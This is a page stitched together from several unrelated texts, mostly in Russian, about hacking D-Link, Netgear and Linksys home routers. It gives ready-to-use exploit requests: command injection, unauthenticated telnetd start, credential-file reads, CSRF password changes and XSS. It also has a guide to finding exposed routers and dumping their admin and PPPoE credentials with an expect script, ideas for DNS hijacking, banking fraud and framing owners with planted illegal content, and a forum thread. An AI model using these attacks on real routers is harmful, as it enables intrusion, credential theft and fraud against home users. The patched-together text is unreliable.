Взлом роутера d link dir 615

Очередные уязвимости нулевого дня в различных роутерах

Время на прочтение
7 мин

Количество просмотров 55K

Похоже, начало года не задалось для производителей роутеров. Буквально сегодня я сообщал о критических уязвимостях в роутерах различных производителей, связанных с небезопасной обработкой протокола UPnP. И вот ещё одна новость на эту же тему. На сей раз уязвимости совершенно разные. Затронуто оборудование:

  • D-Link DIR-615, DIR-600 и DIR-300 (rev B)
  • Netgear DGN1000B
  • Cisco Linksys E1500/E2500
  • Netgear SPH200D

Уязвимости довольно различны, но их объединяет несколько фактов: один автор и нежелание вендора выпускать патч (если верить автору).

D’Link DIR-615

Утверждается что проблема в ревизии H1, прошивки версии 8.04 от 4 сентября 2012 и 8.04 от 18 января 2013. Правда, я не смог найти эти версии на официальном сайте вендора.

Выполнение произвольных команд ОС роутера

Авторизованный пользователь может выполнить произвольную команду на устройстве, отправив GET-запрос, в котором команды будут переданы в параметре

ping_ipaddr

Пример:

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr=

ответ на команду приходит в теле HTTP-ответа:

HTTP/1.0 200 OK
Pragma: no-cache
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript" src="common.js.htm"></script>
<script language="javascript">
CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS});
var pingResult="Domain";
var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<==
var vctinfo= [
{ethport:'0', status:'0', rate:'0', dup:'0'},
{ethport:'1', status:'0', rate:'0', dup:'0'},
{ethport:'2', status:'0', rate:'0', dup:'0'},

Может, кто спросит: «В чём же уязвимость, если авторизованному пользователю только это возможно»? Объясню: злоумышленник может воспользоваться социальной инженерией и кинуть владельцу роутера специально сформированную ссылку.

Раскрытие информации

GET-запрос на адрес вида

http://IP_роутера/gconfig.htm

вернёт нам:

var ModelName = 'DIR-615'; var systemName='DLINK-DIR615'; var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0} 

Изменение пароля без ввода старого

Достаточно послать GET-запрос с таким содержимым:

http://IP_роутера/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615

Представители D-Link были оповещены о проблемах в безопасности, но заявили, что фикса не будет, т.к. по их мнению, это проблема не в их оборудовании, а в браузерах и самих пользователях их устройств.

DIR-600 / DIR 300 — HW rev B1

DIR-300 — уязвимы версии:

  • 2.12 от 18.01.2012
  • 2.13 от 07.11.2012

DIR-600 — уязвимы версии:

  • 2.12b02 от 17/01/2012
  • 2.13b01 от 07/11/2012
  • 2.14b01 от 22/01/2013
Выполнение произвольных команд ОС роутера

Не авторизованный пользователь может выполнить произвольную команду на устройстве, отправив GET-запрос, в котором команды будут переданы в параметре

cmdПример — запуск сервера telnetd

Request:
POST /command.php HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.178.222/
Content-Length: 15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

cmd=telnetd;

Небезопасное хранение чувствительной информации

Пароли на устройстве хранятся в открытом виде, без хеширования:

# cat var/passwd
"admin" "test" "0"

Просмотреть текущий пароль пользователя возможно вот так:

root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
"admin" "THESECRETPASS" "0"
Раскрытие информации

Запрос вида:

http://Target-IP/DevInfo.txt

вернёт нам:

HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267

Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: <snip>
WAN MAC: <snip>
WLAN MAC: <snip>

Представители D-Link были оповещены о проблемах в безопасности, но заявили, что фикса не будет, т.к. по их мнению, это проблема не в их оборудовании, а в браузерах и самих пользователях их устройств.

Netgear SPH200D

Уязвимые версии прошивок:

Firmware Version: 1.0.4.80
Kernel Version: 4.1-18
Web Server Version: 1.5

Чтение файлов на устройстве

Авторизованный пользователь может читать файлы на устройстве

http://IP_роутера/../../etc/passwd

вернёт ответ вида:

HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

root:x:0:0:root:/root:/bin/bash
demo:x:5000:100:Demo User:/home/demo:/bin/bash
nobody:x:65534:65534:Nobody:/htdocs:/bin/bash

аналогично происходит чтение каталогов:

/../../var/

HTTP/1.0 200 OK
Content-type: text/html
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

<H1>Index of ../../var/</H1>

<p><a href="/../../var/.">.</a></p>
<p><a href="/../../var/..">..</a></p>
<p><a href="/../../var/.Skype">.Skype</a></p>
<p><a href="/../../var/jffs2">jffs2</a></p>
<p><a href="/../../var/htdocs">htdocs</a></p>
<p><a href="/../../var/cnxt">cnxt</a></p>
<p><a href="/../../var/ppp">ppp</a></p>
<p><a href="/../../var/conf">conf</a></p>
<p><a href="/../../var/bin">bin</a></p>
<p><a href="/../../var/usr">usr</a></p>
<p><a href="/../../var/tmp">tmp</a></p>

Но т.к. необходимо быть авторизованным на устройстве и необходимо получить ответ на запрос — не совсем ясно каким образом злоумышленник может этим воспользоваться

Межсайтовый скриптинг

image

Наличие «заводского» аккаунта

По-умолчанию, на устройстве существует аккаунт с логином: паролем service:service. Я так понимаю нет возможности его поменять предоставляемыми штатными средствами.

Производитель был уведомлён о проблемах безопасности в августе 2012, но не отреагировал.

Linksys E1500/E2500

Уязвимые версии прошивок:
e1500:

  • v1.0.00 — build 9 -февраль 17, 2011
  • v1.0.04 — build 2 — март 8, 2012
  • v1.0.05 — build 1 — август 23, 2012

e2500

  • v1.0.03
Выполнение произвольных команд ОС роутера

Авторизованный пользователь может выполнить произвольную команду на устройстве, отправив GET-запрос, в котором команды будут переданы в параметре

ping_size

Пример:

http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
Раскрытие директорий

Пример:

POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version

Придёт ответ вида:

HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
Изменение пароля без ввода старого

Авторизованный пользователь может поменять пароль, отправив специально сформированный POST-запрос на устройство:

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/Management.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 
CSRF-атака для смены пароля:
http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
Межсайтовый скриптинг
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

Редирект на другой сайт

POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 290

submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

Ссылки на первоисточник:

  1. Multiple Vulnerabilities in D’Link DIR-600 and DIR-300 (rev B)
  2. Multiple Vulnerabilities in D’Link DIR-615
  3. Multiple Vulnerabilities in Netgear SPH200D [Update: 03.02.2013]
  4. Multiple Vulnerabilities in Linksys E1500/E2500

UniFI-Dlink-DIR-615

Search for the Unifi Dlink DIR-615 router’s Server details = Mathopd/1.5p6 country:MY
The country filter is only for registered user so make sure you have been registered

Image 1

Choose any router you want

To get the user’s creds, enter the following appendage = model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

Image 2

and poof !

Image 3

As you can see, TM’s operator add another hidden account under different name from the previous version
The good news is every D-Link router with copyright 2011 and above is using the same username and password as above while the D-Link router with the copyright 2010 and below is using username operator with different password.
So you guys need to enumerate the creds for every each routers or you can just include the chap-secrets file in the url instead of getting the httpassword first (/etc/ppp/chap-secrets).

Leveraging the Attack

Actually the main reason for me to include /etc/ppp/httpassword is to let advanced attacker to make use of those credentials. For example, by changing the router’s DNS server and set up a malicious DNS server with fake pages. This could lead to more dangerous risks such as online banking fraud, CSRF, and etc.

Image 4

Getting PPPoE username and password

Image 4

Go to the Maintenance tab and enable the Remote Telnet from WAN, then save the settings
No reboot required

Open up a terminal and just telnet to the IP

telnet <ip> <port>
cat /etc/ppp/chap-secrets

And tadaa ! there you go the username and password

To automate the telnet part, use this simple script

#!/usr/bin/expect
set timeout 20
set ip [lindex $argv 0]
spawn telnet $ip 23
expect "login: "
send "Management\n"
expect "Password: "
send "TestingR2\n"
expect "# "
send "cat /etc/ppp/chap-secrets\n"
send "exit\n"
interact

Usage: ./unifi-pppoe-creds

Credits goes to: link 1 and link 2

Проблема известна довольно давно, но компания-производитель не спешит «латать дыры»! Для многих роутеров существует возможность получить доступ к админ-панели, отправив специальный запрос!

Я проверил эту уязвимость на двух своих устройствах: более старом D-link DIR-320 и новом DIR-300NRU. Они оба оказались под угрозой!

Суть заключается в том, что многие пользователи включают возможность удалённого администрирования роутера, чтобы иметь возможность подключаться к нему из любой точки земного шара. Разумеется, что панель администратора защищена паролем, однако этот пароль можно узнать, выполнив запрос вида «/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd».

А вот и наш пароль на роутер в открытом виде!

Подставив это заклинание в адресную строку браузера сразу же после адреса роутера (как локального: 192.168.0.1, так и «внешнего»), вы получите логин и пароль в открытом виде. Если ваш роутер расположен по стандартному адресу (192.168.0.1), то вы можете проверить его уязвимость по этой ссылке!

В этом нет ничего страшного, пока ваш роутер настроен на игнорирование «внешних» подключений, то есть пока вы можете конфигурировать его только при подключении через сеть Wi-Fi или с помощью Ethernet-кабеля. Но если вы разрешаете любому пользователю получать доступ к роутеру, то у вас могут быть проблемы!

Какую информацию может получить или использовать злоумышленник?

Во-первых, он получает доступ к настройкам Wi-Fi точки и может узнать пароль от конкретной точки Wi-Fi:

Мы можем увидеть пароль от точки Wi-Fi

После получения данных для доступа, злоумышленник, проживающий в вашем же городе, может использовать эти данные для подключения к локальной сети и получения доступа к локальным ресурсам, то есть всем «расшаренным» папкам и общим документам!

Во-вторых, он может выяснить внутреннюю инфраструктуру сети и, при необходимости, включить неиспользуемые (но давным-давно заданные) правила перенаправления портов, чтобы получить доступ к FTP, RDP, SSH и другим протоколам и портам.

Отключённые для безопасности пробросы портов можно снова включить!

Существует так же особая модель роутера, которая позволяет подключить внешний жесткий диск и использовать его для загрузки торрентов, раздачи iTunes-библиотеки и прочего. Эта модель также подвержена подобной уязвимости и если злоумышленник обнаружит такой роутер, то сможет получить не только личный «анонимный FTP-сервер», но и получить доступ ко всей информации, хранящейся на этом диске.

Проблема отягчается тем, что роутер очень часто остаётся без присмотра. Это вещь, к которой применимо выражение «работает — не трогай!», поэтому мне мало известно людей, которые проверяют свой роутер хотя бы раз в день. Таким образом, злоумышленник может свободно менять настройки роутера не вызывая подозрений достаточно долгое время, пока хозяин не обнаружит, что его пароль не подходит!

Проверьте свой роутер! Если он выдаёт логин и пароль в чистом виде по приведённой мной выше ссылке, то отключите возможность удалённого администрирования! Снимите галку с «Enable remote management»! Вы всё так же сможете управлять своим роутером, подключаясь к домашней Wi-Fi сети или с помощью кабеля, но злоумышленники не смогут получить доступ!

Снимите галку с enable remote management!

Как ещё можно испортить настроение хозяину роутера?

  • Сменить пароль на подключение к интернет, не изменяя Wi-Fi-пароль
  • Сменить пароль на Wi-Fi
  • Сменить пароль от админ панели
  • Отформатировать подключённый к роутеру жесткий диск
  • Пробросить внутренний порт принтера (DIR-320 и другие) во внешнюю сеть и отправить на печать увлекательные книги Дарьи Донцовой
  • Поднять FTP-сервер, загрузить на подключенный диск нелегальный контент, вызвать представителей закона и натурально упрятать ни в чём неповинного человека на внушительный срок!

Всё ограничивается только фантазией злоумышленника, поэтому:

Если ваш роутер уязвим, немедленно выключите и ни в коем случае не включайте функцию удалённого администрирования!!!

Вся информация представлена в образовательных целях. Автор не несёт ответственности за использование этой информации во вред кому-либо! Берегите свою приватность!

Лучше маленький лайк и репост, чем большое спасибо в комментах. По этой причине комментарии выключены, а кнопки репостов — вас ждут. Пользуйтесь, прошу :)

2018-03-26

tagged:
security,
network

Because some wifi devices had connection issues with my “normal” router (with an integrated wifi access point) I decided to integrate an old D-Link DIR-615 router (with ap) I had still lying around into my wifi network and see whether the connection quality would improve.

Unfortunately I couldn’t remember the admin password I set when that router was still in use. That was kind of a déjà vu because I faced the same issue once when the router was still in use, too. Back then I couldn’t access the reset button due to the device being fixed to the wall. And pressing the reset button is boring either way, no?

Attention: IANAL, but doing the following with a device that you do not own or don’t have explicit (written) consent of the owner to perform these steps is illegal in probably all parts of the world. Moreover it’s probably possible to “brick” — permanently damage — your device.

The “Home Network Administration Protocol” allows querying and setting of configuration options on network devices (such as routers). It’s based on SOAP which effectively means that you’re sending HTTP POST messages with a special header and some XML.

For HNAP1 the special header is a:

SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"

where the GetDeviceSettings part specifies what action you want to perform on the accessed device.

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <soap:Body>
    <GetDeviseSettings xmlns="http://purenetworks.com/HNAP1/">
    </GetDeviseSettings>
  </soap:Body>
  <!-- Header: -->
  <!-- SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings" -->
</soap:Envelope>

Sending the above with

curl -X POST \
  --header "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings\"" \
  --header "Authorization Basic dXNlcjo=" \
  --data @above_xml_in_a_file.xml

returns some XML with device information as well as supported SOAP actions on my DIR-615.

What’s that Authorization header? That’s just basic HTTP authentication for a user account and an empty password:

echo -n "user:" | base64
# dXNlcjo=

Now, on some other D-Link routers one can apparently fool the HNAP implementation by providing a SOAPAction header that doesn’t require authentication (like GetDeviceSettings) but specify an action (which will then get executed by the device) in the XML that would’ve required authentication (like SetDeviceSettings for changing the admin password) — and thus bypass any authentication or authorization.

That’s not the case for my DIR-615: it always requires authentication. Moreover, it also always executes the action specified in the SOAPAction header. But it doesn’t check whether the authenticated client is authorized to execute that action. Put simply: That user account with no password can do everything the admin can do.

So, to change the admin password all that needed was sending

<!-- ... -->
<SetDeviseSettings xmlns="http://purenetworks.com/HNAP1/">
    <AdminPassword>password</AdminPassword>
</SetDeviseSettings>
<!-- ... -->

Note: Errors in the code snippets shown on this page are intentional. Don’t copy and paste; think about what you want to do and whether it’s okay to do.


Сообщения без ответов | Активные темы

Автор Сообщение

Заголовок сообщения: КРИТИЧЕСКАЯ уязвимость в беспроводных роутерах DIR-615 C2

СообщениеДобавлено: Ср апр 14, 2010 11:59 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

Читал что еще до 2006г была некая уязвимость у длинков, которую потом пофиксили.

Сейчас же обнаружил НОВУЮ уязвимость. Уязвимость заключается в следующем. Если знать URL, по которому сохраняется конфигурационный файл, от МОЖНО ДАЖЕ НЕАВТОРИЗОВАННОМУ ПОЛЬЗОВАТЕЛЮ СОХРАНЯТЬ КОНФИГУРАЦИЮ.

Считаю это не то что уязвимость — это просто дырище в безопасности благодаря которой можно увидеть PLAINTEXT`ом пароль пользователя USER и… WI-FI ENCRIPTION PASSWORD!!!!

UPD: Сессия хранится до следующего ребута роутера и НЕВАЖНО откуда вы заходите, никакие кукисы тут не помогут. По ссылке типа

http://192.168.0.1/adv_virtual.asp

вы попадете прямо на админку с привилегиями АДМИНИСТРАТОРА. Для этого не нужно знать пароль\вводить капчу.

Последний раз редактировалось Chajok Вт апр 20, 2010 16:27, всего редактировалось 3 раз(а).

Вернуться наверх

Профиль  

sibuser

Заголовок сообщения: Re: Серьезная уязвимость в беспроводных роутерах DIR-615

СообщениеДобавлено: Ср апр 14, 2010 12:47 

Не в сети



Зарегистрирован: Пн апр 17, 2006 05:20
Сообщений: 255
Откуда: NOVOSIBIRSK

Chajok писал(а):

Читал что еще до 2006г была некая уязвимость у длинков, которую потом пофиксили.

До 2006 года DIR-615 не производили. Так, что некой уязвимости не должно быть, её пофиксили. :lol:

_________________
DI-604, DIR-615, DIR-100, DVA-G3340S, DES-1008, DWL-2100AP, DNS-300, НОВОТЕЛЕКОМ

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения: Re: Серьезная уязвимость в беспроводных роутерах DIR-615

СообщениеДобавлено: Ср апр 14, 2010 13:00 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

sibuser писал(а):

Chajok писал(а):

Читал что еще до 2006г была некая уязвимость у длинков, которую потом пофиксили.

До 2006 года DIR-615 не производили. Так, что некой уязвимости не должно быть, её пофиксили. :lol:

Если вы внимательно читали, то это была уязвимость длинков, а не DIR-615 конкретно.

«Уязвимость позволяет удаленному пользователю получить доступ к конфигурационным файлам устройства.

Уязвимость существует из-за того, что конфигурационные файлы хранятся небезопасным образом в каталоге «cgi-bin». Удаленный пользователь может получить доступ к административному паролю и конфигурационным данным устройства. Пример:

http://[host]/cgi-bin/[file].cfg»

Они залатали дырку, НО этот файл теперь нельзя прямо из каталога получить, его можно получить скриптом. А СКРИПТ МОЖЕТ ВЫЗВАТЬ ЛЮБОЙ ПОЛЬЗОВАТЕЛЬ НЕ АВТОРИЗУЯСЬ. :!: :!: :!:

Вернуться наверх

Профиль  

sibuser

Заголовок сообщения: Re: Серьезная уязвимость в беспроводных роутерах DIR-615

СообщениеДобавлено: Ср апр 14, 2010 13:09 

Не в сети



Зарегистрирован: Пн апр 17, 2006 05:20
Сообщений: 255
Откуда: NOVOSIBIRSK

Chajok писал(а):

Заголовок сообщения: Серьезная уязвимость в беспроводных роутерах DIR-615

А это кто писал не внимательно?

_________________
DI-604, DIR-615, DIR-100, DVA-G3340S, DES-1008, DWL-2100AP, DNS-300, НОВОТЕЛЕКОМ

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения:

СообщениеДобавлено: Ср апр 14, 2010 13:19 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

Текст поста исправил. Имеется ввиду что раньше была похожая уязвимость, которую исправили. Сейчас же появилась НОВАЯ.

Вернуться наверх

Профиль  

AndreTM

Заголовок сообщения:

СообщениеДобавлено: Ср апр 14, 2010 16:55 

Не в сети



Зарегистрирован: Чт апр 20, 2006 04:01
Сообщений: 5326
Откуда: Белозерск

Ну так надо сначала вообще к роутеру доступ получить.

Нет, конечно, если у вас бюджетные домашние рутеры используются как core-маршрутизаторы, да еще в вашей же локалке сидят чужие люди…

_________________
(tm) DWL-2100AP*, DIR-3xx/6xx*, DSL-2xx0*, ANT24-xxxx* | РТ

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения:

СообщениеДобавлено: Ср апр 14, 2010 17:30 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

Хмм… Какой-то непонятный ответ.

Это понятно что нужно получить доступ к роутеру. С тем где их использовать я согласен на 100%. Да вот незадача. В добавок того что в 90% дырой является именно неправильное администрирование добавляется еще и эта.

Первая преграда — шифрование Wi-Fi. WEP шифрование падает смертью храбрых через 20 минут.

Вторая преграда — авторизация в WEB-интерфейсе роутера. Да вот незадача, тут она падает за 2 сек. Неужели ДЛИНК не тестирует безопасность своих продуктов. Что-то же сподвигло их сделать КАПЧУ при авторизации?

Вернуться наверх

Профиль  

bazill

Заголовок сообщения:

СообщениеДобавлено: Ср апр 14, 2010 21:48 

Не в сети



Зарегистрирован: Пт янв 11, 2008 23:20
Сообщений: 27
Откуда: NiNo

не нравится = не ешь. какие проблемы?

з.ы. толсто троллишь слишком.

Вернуться наверх

Профиль  

Vitaliy Korkunov

Заголовок сообщения: Re: Серьезная уязвимость в беспроводных роутерах DIR-615

СообщениеДобавлено: Ср апр 14, 2010 21:54 



Зарегистрирован: Пн авг 17, 2009 17:18
Сообщений: 7321

Chajok писал(а):

Читал что еще до 2006г была некая уязвимость у длинков, которую потом пофиксили.

Сейчас же обнаружил НОВУЮ уязвимость. Уязвимость заключается в следующем. Если знать URL, по которому сохраняется конфигурационный файл, от МОЖНО ДАЖЕ НЕАВТОРИЗОВАННОМУ ПОЛЬЗОВАТЕЛЮ СОХРАНЯТЬ КОНФИГУРАЦИЮ.

Считаю это не то что уязвимость — это просто дырище в безопасности благодаря которой можно увидеть PLAINTEXT`ом пароль пользователя USER и… WI-FI ENCRIPTION PASSWORD!!!!

На основе каких данных были сделаны данные выводы?

_________________
Форум не подразумевает под собой быстрый ответ, хотите быстрый и квалифицированный ответ — звоните в техподдержку компании D-Link 8-800-700-5465

Вернуться наверх

Профиль  

De-Fox

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 08:09 

Не в сети



Зарегистрирован: Чт янв 10, 2008 10:35
Сообщений: 272

Chajok писал(а):

Первая преграда — шифрование Wi-Fi. WEP шифрование падает смертью храбрых через 20 минут.

А кто Вам мешает использовать WPA или WPA2? WEP — это всего лишь стандартизированный алгоритм шифрования, который поддерживается абсолютно всеми производителями беспроводного оборудования. Так что по этому пункту Вы можете предъявлять претензии лично к себе. Используйте более стойкий алгоритм фирования.

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения: Re: Серьезная уязвимость в беспроводных роутерах DIR-615

СообщениеДобавлено: Чт апр 15, 2010 11:38 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

Vitaliy Korkunov писал(а):

Chajok писал(а):

Читал что еще до 2006г была некая уязвимость у длинков, которую потом пофиксили.

Сейчас же обнаружил НОВУЮ уязвимость. Уязвимость заключается в следующем. Если знать URL, по которому сохраняется конфигурационный файл, от МОЖНО ДАЖЕ НЕАВТОРИЗОВАННОМУ ПОЛЬЗОВАТЕЛЮ СОХРАНЯТЬ КОНФИГУРАЦИЮ.

Считаю это не то что уязвимость — это просто дырище в безопасности благодаря которой можно увидеть PLAINTEXT`ом пароль пользователя USER и… WI-FI ENCRIPTION PASSWORD!!!!

На основе каких данных были сделаны данные выводы?

На основе того что на моем роутере по адресу

http://

<ip_adress>/save_configuration.cgi можно сохранить конфигурацию роутера без авторизации. В этом файле пароли хранятся в открытом виде. Проверял со многих компьютеров. Пользователь USER и ADMIN со смененными паролями, пустых паролей нет.

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 11:42 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

De-Fox писал(а):

Chajok писал(а):

Первая преграда — шифрование Wi-Fi. WEP шифрование падает смертью храбрых через 20 минут.

А кто Вам мешает использовать WPA или WPA2? WEP — это всего лишь стандартизированный алгоритм шифрования, который поддерживается абсолютно всеми производителями беспроводного оборудования. Так что по этому пункту Вы можете предъявлять претензии лично к себе. Используйте более стойкий алгоритм фирования.

В данном топике вопрос стоит не в алгоритме шифрования. WPA, WPA2 были разработаны не зря и если они поддерживаются программной\аппаратной частью лучше использовать последний. Вопрос про админку роутера. Не должно там быть такой дыры.

Вернуться наверх

Профиль  

lon9man

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 12:08 

Не в сети



Зарегистрирован: Пт мар 26, 2010 09:04
Сообщений: 36

офигеть, товарищи!! подтверждаю!! по удалёнке зашёл на роутер.. save_configuration.cgi — выдал всю ИНФУ ПОЛНОСТЬЮ!! трудяжки Д-Линка, вы просто мега-спецы!

и на заокеанской прошивке 3.12NA такое тоже присутствует!! когда вы начнёте отвечать по сути дела по 615ой модели?!

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 12:37 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

Пришлось написать линк. Предвижу волну хаков )))

Вернуться наверх

Профиль  

Nite2

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 12:59 

По DIR-615 HW Rev B2 не подтверждаю. Удаленно пытаюсь зайти на такую страницу — пишет «Невозможно открыть страницу». Вечером проверю с локалки…

Прошивка 2.27 бета14.

Вернуться наверх

Кто сейчас на форуме

Сейчас этот форум просматривают: Google [Bot] и гости: 12

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

  • Взять роутер в аренду спб
  • Взлом роутера asus rt n12
  • Ввести логин и пароль в wifi роутере
  • Весь трафик через vpn роутер
  • Виден ли мак адрес через роутер